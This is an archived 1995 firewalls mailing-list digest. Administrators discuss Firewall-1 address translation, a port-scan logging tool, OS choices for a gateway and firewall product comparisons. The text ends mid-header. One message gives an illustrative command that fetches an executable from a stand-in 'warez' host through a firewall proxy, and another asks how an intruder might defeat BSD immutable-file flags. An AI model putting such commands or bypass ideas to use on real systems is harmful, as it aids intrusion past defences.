(adamo@hpcl.cti.gr) From firewalls-owner Wed Aug 9 06:30:18 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA26345 for firewalls-outgoing; Wed, 9 Aug 1995 06:25:32 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA26337 for ; Wed, 9 Aug 1995 06:25:30 -0700 From: F.Wetzels@amc.uva.nl Received: from amccca.amc.uva.nl(145.18.202.35) by miles via smap (V1.3) id sma026333; Wed Aug 9 06:24:41 1995 Received: from amcnol.amc.uva.nl by amc.uva.nl (PMDF V4.3-7 #2498) id <01HTVH460BQ80004UV@amc.uva.nl>; Wed, 9 Aug 1995 15:23:21 MET Received: from amchelix.amc.uva.nl by amcnol.amc.uva.nl (5.0/SMI-5.0) id AA20430; Wed, 9 Aug 1995 15:23:18 +0200 Received: by amchelix.amc.uva.nl (5.x/SMI-5.0) id AA05979; Wed, 9 Aug 1995 15:23:16 +0200 Date: Wed, 09 Aug 1995 15:23:16 +0200 Subject: Re: IP translation in Firewall-1 To: firewalls@greatcircle.com Message-id: <9508091323.AA05979@amchelix.amc.uva.nl> X-Envelope-to: firewalls@greatcircle.com Content-transfer-encoding: 7BIT Content-length: 662 X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk fpmw> NTMK. I have the manual and if it's possible it's an undocumented 'feature'. fpmw> msk fpmw> >Is there anybody know if the Firewall-1 (release 1.2.1) can do fpmw> >IP-translation. That means it can remap the internal networks' IPs to fpmw> >the Firewall's IP. Or can it translate certain IP-addresses into IP-addresses from a pre-defined list? Frank ------------------------------------------------- F.P.M. Wetzels ADIV/CNS D01-319.1 wetzels@amc.uva.nl meibergdreef 15 Voice +31 20 5662916 1105 AZ Amsterdam-ZO Fax +31 20 6973181 ------------------------------------------------- From firewalls-owner Wed Aug 9 07:00:44 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA26501 for firewalls-outgoing; Wed, 9 Aug 1995 06:33:34 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA26482 for ; Wed, 9 Aug 1995 06:33:30 -0700 Received: from edison.eng.auburn.edu(131.204.10.13) by miles via smap (V1.3) id sma026476; Wed Aug 9 06:33:15 1995 Received: from netman.eng.auburn.edu (20663@netman.eng.auburn.edu [131.204.12.24]) by edison.eng.auburn.edu (8.6.12/8.6.4) with ESMTP id IAA29529; Wed, 9 Aug 1995 08:32:06 -0500 From: Doug Hughes Received: from localhost (doug@localhost) by netman.eng.auburn.edu (8.6.4/8.6.4) id IAA15223; Wed, 9 Aug 1995 08:32:04 -0500 Date: Wed, 9 Aug 1995 08:32:04 -0500 Subject: Re: klaxon To: adamo@hpcl.cti.gr Cc: firewalls@greatcircle.com Message-Id: In-Reply-To: <9508091121.AA19819@hpcl.cti.gr> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk klaxon is something I wrote that I put in unused tcp and udp ports in inetd.conf. It catches port scanners like ISS, Satan, et al. by logging the results of the port and the machine it came from via syslog. It is a short C program that is very portable (based on the BSD rexec source code) It does not do RPC or ident. It's available at: ftp.eng.auburn.edu:pub/doug/klaxon.c or http://www.eng.auburn.edu/users/doug/second.html -- ____________________________________________________________________________ Doug Hughes Engineering Network Services System/Net Admin Auburn University doug@eng.auburn.edu "Real programmers use cat > file.as" From firewalls-owner Wed Aug 9 07:30:59 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA27402 for firewalls-outgoing; Wed, 9 Aug 1995 07:01:32 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA27394 for ; Wed, 9 Aug 1995 07:01:30 -0700 Received: from tgserve1.tgslc.org(198.213.16.1) by miles via smap (V1.3) id sma027370; Wed Aug 9 07:00:36 1995 Received: from msmail_gate.tgslc.org (msmail_gate.tgslc.org [198.214.1.252]) by tgserve1.tgslc.org (8.6.9/8.6.9.002) with SMTP id IAA15535 for ; Wed, 9 Aug 1995 08:50:34 -0500 Received: by msmail_gate.tgslc.org with Microsoft Mail id <3028C04D@msmail_gate.tgslc.org>; Wed, 09 Aug 95 09:03:57 CDT From: "Newcomb, Kelly" To: Firewalls-List Subject: RE: Security Date: Wed, 09 Aug 95 09:02:00 CDT Message-ID: <3028C04D@msmail_gate.tgslc.org> Encoding: 32 TEXT X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >>From George Janczuk (auampdrv@ibmmail.com) >> >>Our audit division is interested in gaining access to security based >>resources (ie: mailing lists). I will be recommending this list >>(firewalls), best-of-security and risks. I also seem to remember that >>another SECURITY based list does exist and has been mentioned here before >>- but I have not been able to find it. Does anyone know of this list? (it >>may possibly have been a newsgroup). What would other people recommend as >>an "online" reading list for audit personel? >> Found the message you spoke of (I subscribe to it as well). >From Slemo Warigon >Would like to inform you all that we created an information security >discussion list (INFSEC-L) open for all info security professionals, and >for discussion on issues/trends related to info security. To subscribe, >send subscription message to LISTSERV@ETSUADMN.ETSU.EDU. Thanks! *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* Kelly Newcomb, CISSP Security/Email Administrator Texas Guaranteed Student Loan Corp. Internet: kelly.newcomb@tgslc.org Opinions: Mine, not TGSLC's. *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* From firewalls-owner Wed Aug 9 08:06:33 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA28026 for firewalls-outgoing; Wed, 9 Aug 1995 07:38:33 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA28009 for ; Wed, 9 Aug 1995 07:38:30 -0700 Received: from theory.tc.cornell.edu(132.236.98.174) by miles via smap (V1.3) id sma028005; Wed Aug 9 07:38:16 1995 Received: (from uactech@localhost) by theory.tc.cornell.edu (8.6.9/8.6.6) id KAA45744 for firewalls@GreatCircle.COM; Wed, 9 Aug 1995 10:37:06 -0400 Received: from ovid by ithaca.actech.com (920330.SGI/SMI-4.0) id AA20905; Wed, 9 Aug 95 10:23:17 -0400 Received: by ovid.actech.com (5.x/SMI-SVR4) id AA16358; Wed, 9 Aug 1995 10:23:14 -0400 Received: from Messages.8.5.N.CUILIB.3.45.SNAP.NOT.LINKED.ovid.sun4.51 via MS.5.6.ovid.sun4_51; Wed, 9 Aug 1995 10:23:13 -0400 (EDT) Message-Id: <8k_AHFr6_EEC0YCrk0@ovid> Date: Wed, 9 Aug 1995 10:23:13 -0400 (EDT) From: Steve Gaarder To: firewalls@GreatCircle.COM Subject: SunOS vs Solaris 2 vs Intel/BSD for firewalls Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'm planning to build a dual-homed gateway using TIS's toolkit. I have two choices for hardware platform: a Sparcstation 2 running SunOS 4 or Solaris 2 or an Intel box running BSD. BSD has the drawback that I'm not familiar with it; SunOS 4 has the drawback that source routing is impossible (or just hard?) to disable; Solaris 2 has relatively few packages ported to it. Which do you think is best for this application? thanks, Steven Gaarder Network and Systems Administrator gaarder@actech.com A C Technology, Ithaca, N.Y., USA From firewalls-owner Wed Aug 9 08:35:25 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA27864 for firewalls-outgoing; Wed, 9 Aug 1995 07:21:34 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA27845 for ; Wed, 9 Aug 1995 07:21:30 -0700 From: hoogervorst-6904be01@technet.iaf.nl Received: from linux4nn.iaf.nl(193.67.144.34) by miles via smap (V1.3) id sma027814; Wed Aug 9 07:20:33 1995 Received: from uni4nn.iaf.nl (root@uni4nn.iaf.nl [193.67.144.33]) by linux4nn.iaf.nl (8.6.9/8.6.9) with SMTP id QAA19135 for ; Wed, 9 Aug 1995 16:32:58 +0200 Received: by uni4nn.iaf.nl with UUCP id AA00683 (5.67b/IDA-1.5 for firewalls@greatcircle.com); Wed, 9 Aug 1995 16:19:48 +0100 Received: from technet.iaf.nl by iafnl.iaf.nl with UUCP id AA05404 (5.65c/IDA-1.4.4); Wed, 9 Aug 1995 16:18:27 +0200 Received: by technet.iaf.nl id 0MRRY009 Wed, 09 Aug 95 16:12:34 Message-Id: <9508091612.0MRRY00@technet.iaf.nl> Date: Wed, 09 Aug 95 16:12:34 Subject: RE: IP trans To: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk .>fpmw> NTMK. I have the manual and if it's possible it's an undocumented 'feature'. .>fpmw> msk .>fpmw> >Is there anybody know if the Firewall-1 (release 1.2.1) can do .>fpmw> >IP-translation. That means it can remap the internal networks' IPs to .>fpmw> >the Firewall's IP. .> Or can it translate certain IP-addresses into IP-addresses from a .> pre-defined list? So, logical links are maintained between two .> `virtual' hosts? .> frank As far as I understand of our Firewall-1 supplier it can dynamically assign internal IP-addresses to external (firewall-) IP-addresses. Frank ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ;Frank Hoogervorst ; ;KLPD/IT-organisatie ; ;Driebergen, The Netherlands ; ; ; ;work: hoogervorst-6904be01@technet.iaf.nl ; ;priv: fhvorst@pi.net ; ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ << Disclaimer: All opinions .. etc. >> From firewalls-owner Wed Aug 9 08:42:35 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA27977 for firewalls-outgoing; Wed, 9 Aug 1995 07:33:32 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA27969 for ; Wed, 9 Aug 1995 07:33:30 -0700 Received: from uuneo.neosoft.com(198.64.84.252) by miles via smap (V1.3) id sma027967; Wed Aug 9 07:33:28 1995 Received: from ris1.UUCP (ficc@localhost) by uuneo.neosoft.com (8.6.10/8.6.10) with UUCP id JAA04928 for GreatCircle.COM!Firewalls; Wed, 9 Aug 1995 09:18:46 -0500 Received: by ris1.nmti.com (smail2.5) id AA16359; 9 Aug 95 08:47:30 CDT (Wed) Received: by sonic.nmti.com; id AA03231; Wed, 9 Aug 1995 09:12:29 -0500 From: peter@nmti.com (Peter da Silva) Message-Id: <9508091412.AA03231@sonic.nmti.com.nmti.com> Subject: Re: WWW through firewalls To: hdunn1@csc.com (Patrick Dunn) Date: Wed, 9 Aug 1995 09:12:29 -0500 (CDT) Cc: Firewalls@GreatCircle.COM In-Reply-To: from "Patrick Dunn" at Aug 8, 95 07:37:00 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 1223 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > I cannot speak (write) to other architectures, but, on UNIX-flavored machines > you can "encapsulate" your application by using the chroot(1) program > (or chdir[2]/fchdir[2] system call followed by a chroot[2]/fchroot[2] system > a directory subtree dedicated to that purpose. > By doing this, you ensure that data (including binaries) downloaded from the > net will not have access to anything on your file system "above" the specified > "root" directory. Do you mean that the *firewall proxy* will run chrooted, or the client software? > The downside to this is that you will have to place your "viewer" > applications Oh, the client software. That doesn't help his problem. It's orthoganal to the issue of the firewall. Why? % echo "GET http://warez.com/cracker.exe" | telnet firewall 80 > cracker.exe That's a client program. And because of the way internet domain sockets work, once they manage to run a general program on your system they're inside your firewall. UNIX security would be a lot better if the Chaosnet interface had been standardized on, with all net activity going through the file system. Our OpenNET software on Xenix did that, and you could really build a chrooted jail there. From firewalls-owner Wed Aug 9 09:00:47 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA29083 for firewalls-outgoing; Wed, 9 Aug 1995 08:31:40 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA29029 for ; Wed, 9 Aug 1995 08:31:32 -0700 Received: from unknown(192.108.14.10) by miles via smap (V1.3) id sma029015; Wed Aug 9 08:31:16 1995 Received: from [192.108.14.161] by snd10.med.navy.mil (5.59/25-eef) id AA01371; Wed, 9 Aug 95 08:25:02 PDT Date: Wed, 9 Aug 95 08:25:02 PDT Message-Id: <9508091525.AA01371@snd10.med.navy.mil> X-Sender: snd1pmf@snd10.med.navy.mil X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@greatcircle.com From: snd1pmf@snd10.med.navy.mil (Patrick M. Flaherty) Subject: SAMPLE SECURITY POLICY Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I've been tasked with writing a Network Security Policy for our organization. If anyone would be kind enough to share a copy of their policy I would much appreciate it. Please mail me directly. Thanks in advance. Pat Flaherty Network Manager Naval Medical Center San Diego snd1pmf@snd10.med.navy.mil From firewalls-owner Wed Aug 9 09:56:34 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA00298 for firewalls-outgoing; Wed, 9 Aug 1995 08:53:49 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA00252 for ; Wed, 9 Aug 1995 08:53:42 -0700 From: F.Wetzels@amc.uva.nl Received: from amccca.amc.uva.nl(145.18.202.35) by miles via smap (V1.3) id sma000167; Wed Aug 9 08:52:24 1995 Received: from amcnol.amc.uva.nl by amc.uva.nl (PMDF V4.3-7 #2498) id <01HTVM9XSZPC000597@amc.uva.nl>; Wed, 9 Aug 1995 17:50:47 MET Received: from amchelix.amc.uva.nl by amcnol.amc.uva.nl (5.0/SMI-5.0) id AA22080; Wed, 9 Aug 1995 17:50:40 +0200 Received: by amchelix.amc.uva.nl (5.x/SMI-5.0) id AA07157; Wed, 9 Aug 1995 17:50:39 +0200 Date: Wed, 09 Aug 1995 17:50:39 +0200 Subject: Proxy service on solaris with 2 IP-addresses on one interface To: firewalls@greatcircle.com Message-id: <9508091550.AA07157@amchelix.amc.uva.nl> X-Envelope-to: firewalls@greatcircle.com Content-transfer-encoding: 7BIT Content-length: 1000 X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, I have the following problem. We have two hosts in a secure net. Not everybody is allowed to telnet to these hosts. For each host one should be allowed to telnet to. To guide the IP-traffic through a proxy-server transparently, one can define two IP-addresses on the bastion (solaris 2.x) that represent the two hosts. So, direct traffic between public hosts and secure hosts will not occur. Validating of IP-address will take place on the bastion. But the validation depends also on to *which* host (or which IP-address on the bastion) one wants to telnet. Is there any possibility to reveal to which address a client telnets? So, a choice can be made to telnet to the proper host. Frank ------------------------------------------------- F.P.M. Wetzels ADIV/CNS D01-319.1 wetzels@amc.uva.nl meibergdreef 15 Voice +31 20 5662916 1105 AZ Amsterdam-ZO Fax +31 20 6973181 ------------------------------------------------- From firewalls-owner Wed Aug 9 10:00:42 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA29943 for firewalls-outgoing; Wed, 9 Aug 1995 08:47:51 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA29885 for ; Wed, 9 Aug 1995 08:47:40 -0700 Received: from sashimi.wwa.com(198.49.174.1) by miles via smap (V1.3) id sma029839; Wed Aug 9 08:47:12 1995 Received: by sashimi.wwa.com (Smail3.1.28.1 #8) id m0sgDKR-001Vx0C; Wed, 9 Aug 95 10:45 CDT Message-Id: From: emp547@wwa.com (Eric Westburg) Subject: Firewall Eval - Request Comments To: firewalls-digest@GreatCircle.com Date: Wed, 9 Aug 1995 10:45:58 -0500 (CDT) Cc: emp547@wwa.com (Eric Westburg) X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 1597 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I have researched (read security materials and vendor information) firewalls for my organization. I investigated the following eight products: BorderWare, CyberGuard, Eagle, Firewall-1, Gauntlet, NetSP SNG, SEAL, and Sidewinder. The following is the information that I collected during this research. Please correct me if I misstate a product's features or if I have missed some important point. I am looking for feedback on my conclusions. IMHO some of the more important features that are not common to all firewalls seem to be: Real-time Intruder Detection, Dual DNSs, & partitioned Unix Kernel (Services isolated from each other). It appears that NetSP SNG, SEAL, and Gauntlet do not have Real-time intruder detection. It appears that CyberGuard, and Firewall-1 do not support dual DNSs or at least do not hide the internal addresses on E-Mail. All of the above and Eagle do not have a partitioned Unix Kernel. These conclusions would lead me to recommend the following firewalls (only looking at security - not platform, cost, etc.): 1) Sidewinder or BorderWare 3) Eagle I am looking for feedback on my information and my "draft" recommendations. 1) Did I miss a feature on a firewall, thus, eliminating it from the final running? 2) On DEC's Webpage they are reselling BorderWare as an entry-level firewall, why is it considered an entry-level firewall? 3) Can anyone compare and contrast BorderWare to Sidewinder, what are the pros and cons of each? I am looking forward to your responses. Eric Westburg Senior Security Analyst emp547@wwa.com From firewalls-owner Wed Aug 9 10:26:37 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA02750 for firewalls-outgoing; Wed, 9 Aug 1995 09:39:27 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA02735 for ; Wed, 9 Aug 1995 09:39:24 -0700 Received: from xwing.wcape.gov.za(164.151.101.253) by miles via smap (V1.3) id sma002731; Wed Aug 9 09:39:13 1995 Received: from cncjnk.wcape.gov.za (cncjnk.wcape.gov.za [164.151.188.247]) by xwing.wcape.gov.za (8.6.11/8.6.12) with SMTP id SAA18323; Wed, 9 Aug 1995 18:38:11 +0200 Received: from CNCJNK/MAILQ by cncjnk.wcape.gov.za (Mercury 1.13); Wed, 9 Aug 95 18:39:30 +0200 Received: from MAILQ by CNCJNK (Mercury 1.13); Tue, 8 Aug 95 14:18:13 +0200 From: "CASSIDY MEYER" Organization: Western Cape Scientific Services To: Frederick M Avolio Date: Tue, 8 Aug 1995 14:18:07 +0200 Subject: Re: iWay-One CC: firewalls@greatcircle.com Priority: normal X-mailer: Pegasus Mail/Windows (v1.22) Message-ID: <4CB531EA@cncjnk.wcape.gov.za> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >From: Frederick M Avolio >To: CASSIDY MEYER >Cc: firewalls@greatcircle.com >Subject: Re: iWay-One >Date: Tue, 08 Aug 95 07:58:57 -0400 >There was going to be an Internet Firewalls Symposium, to be held in >Dallas. But when all of the vendors who had a firewall registered, it >was found that there was no room left in Dallas hotels for attendees. >I am joking. >f funny From firewalls-owner Wed Aug 9 10:30:08 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA01569 for firewalls-outgoing; Wed, 9 Aug 1995 09:20:56 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA01529 for ; Wed, 9 Aug 1995 09:20:50 -0700 Received: from mercury.sun.com(192.9.25.1) by miles via smap (V1.3) id sma001517; Wed Aug 9 09:20:32 1995 Received: from Eng.Sun.COM by mercury.Sun.COM (Sun.COM) id JAA12670; Wed, 9 Aug 1995 09:19:02 -0700 Received: from olympics. (olympics.Eng.Sun.COM) by Eng.Sun.COM (5.x/SMI-5.3) id AA00712; Wed, 9 Aug 1995 09:18:57 -0700 Received: by olympics. (5.x/CRAY-5.1) id AA08241; Wed, 9 Aug 1995 09:11:55 -0700 Date: Wed, 9 Aug 1995 09:11:55 -0700 From: Brad.Powell@Eng.Sun.COM (Brad Powell) Message-Id: <9508091611.AA08241@olympics.> To: firewalls@GreatCircle.COM, gaarder@actech.com Subject: Re: SunOS vs Solaris 2 vs Intel/BSD for firewalls X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >From firewalls-owner@GreatCircle.COM Wed Aug 9 08:24:41 1995 >Subject: SunOS vs Solaris 2 vs Intel/BSD for firewalls > >I'm planning to build a dual-homed gateway using TIS's toolkit. I have >two choices for hardware platform: a Sparcstation 2 running SunOS 4 or >Solaris 2 or an Intel box running BSD. All have gotchas that can be avoided :-) >BSD has the drawback that I'm >not familiar with it; That is a tough one to fix then. Go with something you know inside and out. BSD *does* have an advantage of having source code without paying for the source license. > SunOS 4 has the drawback that source routing is >impossible (or just hard?) to disable; Not at all. I posted a hacked up version that added a kernel flag to block/drop ip_source_route. Its in the Firewall archives as well as many ftp/http sites. Try ftp.greatcircle.com:/pub/firewalls/digest or http://all.net Solaris 2 has relatively few >packages ported to it. sometimes this is an advantage since the break-in tools are not ported either ;^) > >Which do you think is best for this application? > Any of the above can be configured to be a strong firewall. It depends on what services you want to offer as to which is best. How about a little more detail? ======================================================================= Brad Powell : brad.powell@Sun.COM Sr. Network Security Consultant SunNetworks, Sun Microsystems Inc. ======================================================================= The views expressed are those of the author and may not reflect the views of Sun Microsystems Inc. ======================================================================= From firewalls-owner Wed Aug 9 11:32:43 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA03542 for firewalls-outgoing; Wed, 9 Aug 1995 10:03:27 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA03534 for ; Wed, 9 Aug 1995 10:03:25 -0700 Received: from relay3.uu.net(192.48.96.8) by miles via smap (V1.3) id sma003532; Wed Aug 9 10:03:18 1995 Received: from uucp5.UU.NET by relay3.UU.NET with SMTP id QQzcbk11471; Wed, 9 Aug 1995 13:02:12 -0400 Received: from percon.UUCP by uucp5.UU.NET with UUCP/RMAIL ; Wed, 9 Aug 1995 13:02:14 -0400 Received: from tom.percon.com by percon.percon.com id aa09386; 9 Aug 95 9:44 PDT Received: by tom with Microsoft Mail id <01BA663D.0063F920@tom>; Wed, 9 Aug 1995 09:46:29 -0700 Message-ID: <01BA663D.0063F920@tom> From: Tom Huseby To: "'Firewalls'" Subject: Morning Star Secure Connect Routers Date: Wed, 9 Aug 1995 09:46:21 -0700 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Can anybody vouch for the reliability of Morning Star Secure Connect Routers? Tom tom@percon.com From firewalls-owner Wed Aug 9 12:08:31 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA03476 for firewalls-outgoing; Wed, 9 Aug 1995 10:01:29 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA03449 for ; Wed, 9 Aug 1995 10:01:25 -0700 Received: from fw1.nda.com(204.57.47.254) by miles via smap (V1.3) id sma003442; Wed Aug 9 10:00:44 1995 Received: (kovar@localhost) by nda.nda.com (8.6.11/8.6.4) id MAA02175; Wed, 9 Aug 1995 12:58:41 -0400 From: David Kovar Message-Id: <199508091658.MAA02175@nda.nda.com> Subject: Re: sleazewinder To: hobbit@avian.org (*Hobbit*) Date: Wed, 9 Aug 1995 12:58:41 -0400 (EDT) Cc: firewalls@GreatCircle.COM In-Reply-To: <199508090414.AAA07814@narq.avian.org> from "*Hobbit*" at Aug 9, 95 00:14:31 am X-Mailer: ELM [version 2.4 PL20] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 602 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > CONCERN 3. Is the Challenge a serious learning tool or a Marketing tactic? > The answer is both. > > The answer so far is "marketing tactic" from the standpoint of "out here on > the net", unless you intend to do something about it. Where are your RESULTS?? > Where is OUR benefit from all the free work that the community at large has > given you? The only result of this that I've seen so far is at a trade show the other week. At their booth they were announcing something like: Hackers: 0% Sidewinder: 100% Sidewinder stopped every single one of the best hackers efforts! -David From firewalls-owner Wed Aug 9 12:09:33 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA05271 for firewalls-outgoing; Wed, 9 Aug 1995 10:42:49 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA05239 for ; Wed, 9 Aug 1995 10:42:43 -0700 Received: from dub-img-2.compuserve.com(198.4.9.2) by miles via smap (V1.3) id sma005229; Wed Aug 9 10:42:32 1995 Received: by dub-img-2.compuserve.com (8.6.10/5.950515) id NAA29681; Wed, 9 Aug 1995 13:41:26 -0400 Date: 09 Aug 95 13:39:25 EDT From: Tammy Oreglia To: Subject: Newbie Question.. Alert Alert Message-ID: <950809173925_555063.0_EHF83-1@CompuServe.COM> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi all: I have been working on setting up internet access for my company and have received a few quotes from service providers. The following is a configuration that we are considering: 56Kbps line Morningstar MST-SC3003 Router with CSU/DSU My question is - does the Morningstar router have sufficient security, or should we consider a firewall as well? We are planning on using this connection for email, web browsing, 3270 emulation (using Wollongong's TN3270) etc., and eventually plan on setting up an FTP server. Oh BTW, we currently have a Novell network (routing IPX only). Any feedback would be appreciated. Thank you for your consideration. Tammy Oreglia Systems Manager Osborne/McGraw-Hill email: toreglia@osborne.mhs.compuserve.com From firewalls-owner Wed Aug 9 12:18:14 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA07146 for firewalls-outgoing; Wed, 9 Aug 1995 11:15:23 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA07114 for ; Wed, 9 Aug 1995 11:15:18 -0700 Received: from cseic.saic.com(139.121.32.135) by miles via smap (V1.3) id sma007100; Wed Aug 9 11:14:21 1995 Received: by cseic.saic.com (4.1/1.34) id AA19205; Wed, 9 Aug 95 14:11:51 EDT Date: Wed, 9 Aug 95 14:11:51 EDT From: steveg@cseic.saic.com (Stephen Harold Goldstein) Message-Id: <9508091811.AA19205@cseic.saic.com> To: gaarder@actech.com Cc: firewalls@GreatCircle.COM In-Reply-To: <8k_AHFr6_EEC0YCrk0@ovid> (message from Steve Gaarder on Wed, 9 Aug 1995 10:23:13 -0400 (EDT)) Subject: Re: SunOS vs Solaris 2 vs Intel/BSD for firewalls Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Steve Gaarder writes: >I'm planning to build a dual-homed gateway using TIS's toolkit. I have >two choices for hardware platform: a Sparcstation 2 running SunOS 4 or >Solaris 2 or an Intel box running BSD. BSD has the drawback that I'm >not familiar with it; SunOS 4 has the drawback that source routing is >impossible (or just hard?) to disable; Solaris 2 has relatively few >packages ported to it. > >Which do you think is best for this application? My vote (with 1 reservation - see below) would be for BSD for at least two reasons: 1) Its chflags command which can set files as append-only (sappnd) or "immutable" (schg). With these additional features prudently applied to critical files, even if root were compromised, the intruder would be unable to (a) erase any logs that tracked his actions (b) replace things like /bin/login with a hacked version, etc. 2) In the warm and fuzzy department, it's been used as the base for at least two reasonably respected commercial firewalls - TIS and Borderware (though I believe each has performed their own "hardening" of the kernel). As for (1), in theory these flags can only be changed when the box is in single user mode, but the man page for chflags seems to imply there may be another way: "If either or both of sappnd or schg is set, however, not even the super-user can change the flags unless the system is in ``insecure'' mode (typically, single user). The user flags can be set by the owner or the super-user; the system flags can only be set by the super-user." Anyone know of a way an intruder might induce "insecure" mode while in multi-user mode? From firewalls-owner Wed Aug 9 12:35:54 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA10402 for firewalls-outgoing; Wed, 9 Aug 1995 12:15:17 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA10363 for ; Wed, 9 Aug 1995 12:15:11 -0700 Received: from utrecht.knoware.nl(193.78.120.3) by miles via smap (V1.3) id sma010351; Wed Aug 9 12:15:05 1995 Received: from csehost.idiscover.co.uk (csehost.idiscover.co.uk [194.128.134.177]) by utrecht.knoware.nl (8.6.12/8.6.12) with SMTP id VAA11662; Wed, 9 Aug 1995 21:13:26 +0200 Date: Wed, 9 Aug 1995 21:13:26 +0200 Message-Id: <199508091913.VAA11662@utrecht.knoware.nl> X-Sender: njb@pop.knoware.nl Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: "Crandall, John" From: njb@knoware.nl (Niels Bjergstrom) Subject: Re: InfoSec policies made easy? - YES!! Cc: firewalls@greatcircle.com X-Mailer: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > >I missed the beginning of this thread, can someone provide me more >information on Cresson's book? The best way to get more info about Charles Cressons books and other things, I think would be to contact info@baselinesoft.com Recommended! Niels ------------------------------------------------------------------------ -- Niels J Bjergstrom, Ph.D., m/ISACA Tel. +31 70 362 2269 -- -- Computer Security Engineers, Ltd. Fax. +31 70 365 2286 -- -- Postbus 85 502, NL-2508 CE Den Haag London: +44 181 519 8011 -- -- Netherlands Email: njb@csehost.knoware.nl -- -- PGP Public key available on request - please use when mailing vira -- ------------------------------------------------------------------------ From firewalls-owner Wed Aug 9 13:00:47 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA11246 for firewalls-outgoing; Wed, 9 Aug 1995 12:26:44 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA11166 for ; Wed, 9 Aug 1995 12:26:32 -0700 Received: from neptune.tis.com(192.94.214.96) by miles via smap (V1.3) id sma011143; Wed Aug 9 12:25:36 1995 Received: from relay.tis.com by neptune.TIS.COM id aa06880; 9 Aug 95 15:21 EDT Received: from sol.tis.com(192.33.112.100) by relay.tis.com via smap (g3.0.1) id xma021323; Wed, 9 Aug 95 15:12:33 -0400 Received: from sol.tis.com by tis.com (4.1/SUN-5.64) id AA18913; Wed, 9 Aug 95 15:19:59 EDT Message-Id: <9508091919.AA18913@tis.com> From: Frederick M Avolio X-Organization: 